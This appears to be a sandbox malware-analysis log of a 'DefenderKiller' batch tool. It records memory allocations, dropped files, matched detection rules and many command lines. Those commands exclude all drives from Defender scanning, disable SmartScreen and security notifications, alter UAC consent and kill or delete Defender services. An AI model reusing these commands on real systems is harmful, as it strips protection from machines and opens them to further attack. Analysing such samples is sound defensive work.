base_address: 0x000007ff00043000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00056000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00143000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0010c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff00103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3568
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007ff0004a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MsMpCom.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\temp.vbs
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpClient.dll
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MpAsDesc.dll
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpRTP.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\DefenderStopx86.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\NSudoLC.exe
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MsMpCom.dll
file C:\WDefenderBackup\Folder\WinSxS\wow64_security-malware-windows-defender_31bf3856ad364e35_6.1.7600.16385_none_be064cc3a640e167\MpOAV.dll
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MsMpLics.dll
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MpSvc.dll
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MpClient.dll
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MpCmdRun.exe
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpCmdRun.exe
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MpCommu.dll
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MsMpRes.dll
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MSASCui.exe
file C:\WDefenderBackup\Folder\Program Files (x86)\Windows Defender\MsMpLics.dll
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpSvc.dll
file C:\WDefenderBackup\Folder\Program Files (x86)\Windows Defender\MpOAV.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\nhmb.exe
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MpRTP.dll
file C:\WDefenderBackup\Folder\Program Files (x86)\Windows Defender\MpAsDesc.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\cecho.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\nircmd.exe
file C:\WDefenderBackup\Folder\WinSxS\wow64_security-malware-windows-defender_31bf3856ad364e35_6.1.7600.16385_none_be064cc3a640e167\MpClient.dll
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpOAV.dll
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpAsDesc.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\DefenderKiller.bat
file C:\WDefenderBackup\Folder\WinSxS\wow64_security-malware-windows-defender_31bf3856ad364e35_6.1.7600.16385_none_be064cc3a640e167\MsMpLics.dll
file C:\WDefenderBackup\Folder\WinSxS\wow64_security-malware-windows-defender_31bf3856ad364e35_6.1.7600.16385_none_be064cc3a640e167\MpAsDesc.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\Unlocker.exe
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MsMpLics.dll
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpCommu.dll
file C:\WDefenderBackup\Folder\Program Files (x86)\Windows Defender\MpClient.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\7z.exe
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MpOAV.dll
file C:\WDefenderBackup\Folder\ProgramData\Microsoft\Windows Defender\Definition Updates\{CE30CEB1-2E0C-4A02-B591-7C0F3A5A790A}\mpengine.dll
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender-events_31bf3856ad364e35_6.1.7600.16385_none_118cf1dcd54a3dea\MpEvMsg.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\DefenderStopx64.exe
file C:\WDefenderBackup\Folder\WinSxS\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306\MSASCui.exe
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MsMpRes.dll
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\LGPO.exe
file C:\WDefenderBackup\Folder\Program Files\Windows Defender\MpEvMsg.dll
Time & API Arguments Status Return Repeated

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Windows\System32\GroupPolicy
filepath: C:\Windows\System32\GroupPolicy
1 1 0

SetFileAttributesW

file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Windows\System32\GroupPolicy
filepath: C:\Windows\System32\GroupPolicy
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Firefox.lnk
file C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\system32\cmd.exe /S /D /c" dir /b "C:\WDefenderBackup\Folder\ProgramData\Microsoft\Windows Defender" "
cmdline cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
cmdline xcopy /s /e /h /y /i "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance" "C:\WDefenderBackup\Folder\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
cmdline NSudoLC -U:C -ShowWindowMode:Hide cmd.exe /c start explorer.exe
cmdline xcopy /s /e /h /y /i "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance" "C:\WDefenderBackup\Folder\System32\WindowsPowerShell\v1.0\Modules\DefenderPerformance"
cmdline PowerShell "Get-PSDrive -PSProvider 'FileSystem' | ForEach-Object { Add-MpPreference -ExclusionPath $_.Root }"
cmdline C:\Windows\system32\cmd.exe /c ver
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo "C:\Users\test22\AppData\Local\Temp\RarSFX0\" "
cmdline C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoLogonSID" 2>nul
cmdline cmd.exe /c start explorer.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" ver "
cmdline xcopy /s /e /h /y /i "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender" "C:\WDefenderBackup\Folder\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender"
cmdline xcopy /s /e /h /y /i "C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender" "C:\WDefenderBackup\Folder\System32\WindowsPowerShell\v1.0\Modules\Defender"
cmdline NSudoLC -U:C -ShowWindowMode:Hide cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
cmdline NSudoLC -U:C -ShowWindowMode:Hide cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
cmdline cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
cmdline cmd.exe /c taskkill /f /im explorer.exe
cmdline NSudoLC -U:C -ShowWindowMode:Hide -Wait PowerShell "Get-PSDrive -PSProvider 'FileSystem' | ForEach-Object { Add-MpPreference -ExclusionPath $_.Root }"
cmdline NSudoLC -U:C -ShowWindowMode:Hide -Wait cmd.exe /c taskkill /f /im explorer.exe
cmdline nircmd win activate process cmd.exe
cmdline nircmd win center process cmd.exe
cmdline C:\Windows\system32\cmd.exe /c 2>nul reg query "HKLM\System\CurrentControlSet\Services" /f "webthreatdefusersvc*" /k|findstr H
cmdline C:\Windows\system32\cmd.exe /c cscript //nologo temp.vbs
file C:\Users\test22\AppData\Local\Temp\RarSFX0\DefenderKiller.bat
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\NSudoLC.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\nircmd.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\cecho.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\nhmb.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\7z.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\Unlocker.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\LGPO.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\nhmb.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\Unlocker.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\DefenderStopx86.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\cecho.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\7z.exe
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\LGPO.exe
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mmc.exe")
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "smartscreen.exe")
wmi Select FreeSpace from Win32_LogicalDisk Where DeviceID = 'C:'
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "explorer.exe")
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeRestorePrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeSecurityPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeShutdownPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000001
process_identifier: 1452
process_handle: 0x0000000000000180
0 0

NtTerminateProcess

status_code: 0x00000001
process_identifier: 1452
process_handle: 0x0000000000000180
1 0 0
cmdline sc query MsSecWfp
cmdline sc query MsSecCore
cmdline taskkill /f /im explorer.exe
cmdline C:\Windows\system32\cmd.exe /S /D /c" dir /b "C:\WDefenderBackup\Folder\ProgramData\Microsoft\Windows Defender" "
cmdline reg export "HKLM\System\CurrentControlSet\Services\MsSecFlt" "C:\WDefenderBackup\ServicesDrivers\MsSecFlt.reg"
cmdline reg export "HKLM\System\CurrentControlset\Control\WMI\Autologger\DefenderApiLogger" "C:\WDefenderBackup\RegEdit\9.reg"
cmdline cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
cmdline reg export "HKLM\Software\Microsoft\SystemSettings\SettingId\SystemSettings_WindowsDefender_UseWindowsDefender" "C:\WDefenderBackup\RegEdit\15.reg"
cmdline reg delete "HKLM\Software\Microsoft\Windows Script Host\Settings" /v "Enabled" /f
cmdline reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
cmdline reg export "HKLM\System\CurrentControlSet\Services\WdNisDrv" "C:\WDefenderBackup\ServicesDrivers\WdNisDrv.reg"
cmdline taskkill /f /im smartscreen.exe
cmdline reg export "HKLM\Software\Microsoft\Windows Advanced Threat Protection" "C:\WDefenderBackup\RegEdit\13.reg"
cmdline reg export "HKLM\Software\Microsoft\Windows Defender Security Center" "C:\WDefenderBackup\RegEdit\12.reg"
cmdline sc query Sense
cmdline C:\Windows\system32\cmd.exe /c reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoLogonSID" 2>nul
cmdline taskkill /f /im mmc.exe
cmdline sc query WdBoot
cmdline xcopy /s /e /h /y /i "C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection" "C:\WDefenderBackup\Folder\ProgramData\Microsoft\Windows Defender Advanced Threat Protection"
cmdline reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" "C:\WDefenderBackup\RegEdit\6.reg"
cmdline reg export "HKLM\System\CurrentControlSet\Services\wscsvc" "C:\WDefenderBackup\ServicesDrivers\wscsvc.reg"
cmdline reg export "HKLM\System\CurrentControlSet\Services\webthreatdefusersvc" "C:\WDefenderBackup\ServicesDrivers\webthreatdefusersvc.reg"
cmdline chcp 866
cmdline reg query "HKLM\System\CurrentControlSet\Services" /f "webthreatdefusersvc*" /k
cmdline cecho.exe {0a}Sense{#} {08} [Служба Advanced Threat Protection]{\n #}
cmdline reg export "HKLM\Software\Microsoft\Windows Security Health" "C:\WDefenderBackup\RegEdit\14.reg"
cmdline reg export "HKLM\System\CurrentControlSet\Services\MsSecWfp" "C:\WDefenderBackup\ServicesDrivers\MsSecWfp.reg"
cmdline reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d 5 /f
cmdline reg export "HKLM\System\CurrentControlSet\Services\WdNisSvc" "C:\WDefenderBackup\ServicesDrivers\WdNisSvc.reg"
cmdline reg export "HKLM\System\CurrentControlSet\Services\SgrmAgent" "C:\WDefenderBackup\ServicesDrivers\SgrmAgent.reg"
cmdline reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace\{D8559EB9-20C0-410E-BEDA-7ED416AECC2A}" "C:\WDefenderBackup\RegEdit\19.reg"
cmdline reg add "HKLM\Software\DefenderKiller" /f
cmdline reg export "HKLM\System\CurrentControlSet\Services\MsSecCore" "C:\WDefenderBackup\ServicesDrivers\MsSecCore.reg"
cmdline reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" "C:\WDefenderBackup\RegEdit\7.reg"
cmdline reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\VolumeCaches\Windows Defender" "C:\WDefenderBackup\RegEdit\8.reg"
cmdline reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\NIS-Driver-WFP/Diagnostic" "C:\WDefenderBackup\RegEdit\18.reg"
cmdline reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/WHC" "C:\WDefenderBackup\RegEdit\17.reg"
cmdline reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoLogonSID"
cmdline reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
cmdline sc query MsSecFlt
cmdline NSudoLC -U:C -ShowWindowMode:Hide cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
cmdline reg export "HKLM\System\CurrentControlSet\Services\wtd" "C:\WDefenderBackup\ServicesDrivers\wtd.reg"
cmdline sc query webthreatdefusersvc
cmdline reg export "HKCR\Directory\shellex\ContextMenuHandlers\EPP" "C:\WDefenderBackup\RegEdit\2.reg"
cmdline reg export "HKLM\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved" "C:\WDefenderBackup\RegEdit\5.reg"
cmdline NSudoLC -U:C -ShowWindowMode:Hide cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0" /f
cmdline cmd.exe /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0" /f
cmdline xcopy /s /e /h /y /i "C:\Program Files (x86)\Windows Defender Advanced Threat Protection" "C:\WDefenderBackup\Folder\Program Files (x86)\Windows Defender Advanced Threat Protection"
cmdline reg export "HKLM\Software\Classes\CLSID\{09A47860-11B0-4DA5-AFA5-26D86198A780}" "C:\WDefenderBackup\RegEdit\4.reg"
cmdline sc query SgrmBroker
wmi Select FreeSpace from Win32_LogicalDisk Where DeviceID = 'C:'
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\echo.DWORD:2
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\echo.DWORD:1
file C:\Users\test22\AppData\Local\Temp\RarSFX0\Work\echo.DWORD:0
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x00000000004720f0
service_name: None
control_code: 1
0 0

ControlService

service_handle: 0x00000000004720f0
service_name: None
control_code: 1
0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin
cmd cecho.exe {0a}sgrmagent{#}{08} [драйвер system guard runtime monitor agent driver]{\n #}sc query mssecwfp sc query msseccore taskkill /f /im explorer.exe c:\windows\system32\cmd.exe /s /d /c" dir /b "c:\wdefenderbackup\folder\programdata\microsoft\windows defender" "nircmd killprocess sgrmbroker.exereg export "hklm\system\currentcontrolset\services\mssecflt" "c:\wdefenderbackup\servicesdrivers\mssecflt.reg"reg export "hklm\system\currentcontrolset\control\wmi\autologger\defenderapilogger" "c:\wdefenderbackup\regedit\9.reg"cecho.exe {0a}shealthui{#}{08} [безопасность windows]{\n #}cmd.exe /c reg add "hkcu\software\microsoft\windows\currentversion\notifications\settings\windows.systemtoast.securityandmaintenance" /v "enabled" /t reg_dword /d "0" /f timeout /t 1 /nobreak nircmd killprocess sechealthui.exenircmd win settext foreground "dk"cecho.exe {02} создаём резервную копию папок из c:\program files (x86) и c:\program files (x86){\n #}xcopy /s /e /h /y /i "c:\windows\syswow64\windowspowershell\v1.0\modules\defenderperformance" "c:\wdefenderbackup\folder\syswow64\windowspowershell\v1.0\modules\defenderperformance"cecho.exe {03} используем defenderstop x64 3 раза для отключения служб защитника{\n #}{\n #}cecho.exe {0c}windefend{#} {08} [служба антивирусная программа защитника windows]{\n #}reg export "hklm\software\microsoft\systemsettings\settingid\systemsettings_windowsdefender_usewindowsdefender" "c:\wdefenderbackup\regedit\15.reg"cecho.exe {03} используем defenderstop x64 для отключения служб защитника{\n #}{\n #}nsudolc -u:c -showwindowmode:hide cmd.exe /c start explorer.exe xcopy /s /e /h /y /i "c:\windows\system32\sgrm" "c:\wdefenderbackup\folder\system32\sgrm"reg delete "hklm\software\microsoft\windows script host\settings" /v "enabled" /f cecho.exe {02} создаём резервную копию папок из winsxs{\n #}xcopy "c:\windows\winsxs\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306" "c:\wdefenderbackup\folder\winsxs\amd64_security-malware-windows-defender_31bf3856ad364e35_6.1.7601.17514_none_b5e2b6396ecea306" /i /e /h /ycecho.exe {0c} повторное удаление защитника с помощью unlocker{\n #}{\n #}xcopy /s /e /h /y /i "c:\windows\security\database" "c:\wdefenderbackup\folder\windows\security\database"findstr /c:"(" /c:")" findstr /r "^" cecho.exe {0a}smartscreenspecific{\n #}cecho.exe {0a}wdfilter{#}{08} [драйвер wd antivirus mini-filter driver]{\n #}reg add "hkcu\software\microsoft\windows\currentversion\apphost" /v "enablewebcontentevaluation" /t reg_dword /d "0" /f reg export "hklm\system\currentcontrolset\services\wdnisdrv" "c:\wdefenderbackup\servicesdrivers\wdnisdrv.reg"xcopy /s /e /h /y /i "c:\windows\system32\windowspowershell\v1.0\modules\defenderperformance" "c:\wdefenderbackup\folder\system32\windowspowershell\v1.0\modules\defenderperformance"cecho.exe {03}состояние процессов защитника:{\n #}taskkill /f /im smartscreen.exepowershell "get-psdrive -psprovider 'filesystem' | foreach-object { add-mppreference -exclusionpath $_.root }" reg export "hklm\software\microsoft\windows advanced threat protection" "c:\wdefenderbackup\regedit\13.reg"cecho.exe {0a}windows defender scheduled scan{\n #}reg export "hklm\software\microsoft\windows defender security center" "c:\wdefenderbackup\regedit\12.reg"xcopy "c:\windows\winsxs\amd64_security-malware-windows-defender-events_31bf3856ad364e35_6.1.7600.16385_none_118cf1dcd54a3dea" "c:\wdefenderbackup\folder\winsxs\amd64_security-malware-windows-defender-events_31bf3856ad364e35_6.1.7600.16385_none_118cf1dcd54a3dea" /i /e /h /ydefenderstopx64.exexcopy /s /e /h /y /i "c:\program files\microsoft update health tools" "c:\wdefenderbackup\folder\program files\microsoft update health tools"c:\windows\system32\cmd.exe /c vercecho.exe {03} используем unlocker для разблокировки папок защитника{\n #}{\n #}sc query sense cecho.exe {0a}windows defender verification{\n #}c:\windows\system32\cmd.exe /s /d /c" echo "c:\users\test22\appdata\local\temp\rarsfx0\" "c:\windows\system32\cmd.exe /c reg query "hklm\software\microsoft\windows nt\currentversion\winlogon" /v "autologonsid" 2>nulxcopy /s /e /h /y /i "c:\programdata\microsoft\storage health" "c:\wdefenderbackup\folder\programdata\microsoft\storage health"cmd.exe /c start explorer.exe taskkill /f /im mmc.exe sc query wdboot xcopy /s /e /h /y /i "c:\programdata\microsoft\windows defender advanced threat protection" "c:\wdefenderbackup\folder\programdata\microsoft\windows defender advanced threat protection"reg export "hklm\software\microsoft\windows\currentversion\run" "c:\wdefenderbackup\regedit\6.reg"reg export "hklm\system\currentcontrolset\services\wscsvc" "c:\wdefenderbackup\servicesdrivers\wscsvc.reg"cecho.exe {03}состояние заданий в планировщике:{\n #}nircmd killprocess securityhealthhost.exececho.exe {08} папка "c:\programdata\microsoft\windows defender" не удалилась с 1 раза{\n #}xcopy /s /e /h /y /i "c:\windows\system32\healthattestationclient" "c:\wdefenderbackup\folder\system32\healthattestationclient"cecho.exe {0a}mssecwfp{#}{08} [драйвер microsoft security wfp callout driver]{\n #}cecho.exe {0c} выполняем удаление с помощью unlocker by eject{\n #}reg export "hklm\system\currentcontrolset\services\webthreatdefusersvc" "c:\wdefenderbackup\servicesdrivers\webthreatdefusersvc.reg"c:\windows\system32\cmd.exe /s /d /c" ver "nircmd killprocess nissrv.exechcp 866 reg query "hklm\system\currentcontrolset\services" /f "webthreatdefusersvc*" /kcecho.exe {0a}sense{#} {08} [служба advanced threat protection]{\n #}reg export "hklm\software\microsoft\windows security health" "c:\wdefenderbackup\regedit\14.reg"reg export "hklm\system\currentcontrolset\services\mssecwfp" "c:\wdefenderbackup\servicesdrivers\mssecwfp.reg"reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d 5 /f reg export "hklm\system\currentcontrolset\services\wdnissvc" "c:\wdefenderbackup\servicesdrivers\wdnissvc.reg"reg export "hklm\system\currentcontrolset\services\sgrmagent" "c:\wdefenderbackup\servicesdrivers\sgrmagent.reg"xcopy "c:\windows\winsxs\wow64_security-malware-windows-defender_31bf3856ad364e35_6.1.7600.16385_none_be064cc3a640e167" "c:\wdefenderbackup\folder\winsxs\wow64_security-malware-windows-defender_31bf3856ad364e35_6.1.7600.16385_none_be064cc3a640e167" /i /e /h /yreg export "hklm\software\microsoft\windows\currentversion\explorer\controlpanel\namespace\{d8559eb9-20c0-410e-beda-7ed416aecc2a}" "c:\wdefenderbackup\regedit\19.reg"reg add "hklm\software\defenderkiller" /f7z e -aoa -bso0 -bsp1 "toolsfordk.zip" -p"unlockerpass" "defenderstopx64.exe" "unlocker.exe"xcopy /s /e /h /y /i "c:\windows\system32\securityhealth" "c:\wdefenderbackup\folder\system32\securityhealth"findstr hcecho.exe {0a}mpsigstub{#}{08} [malware protection signature update stub]{\n #}xcopy /s /e /h /y /i "c:\windows\syswow64\windowspowershell\v1.0\modules\defender" 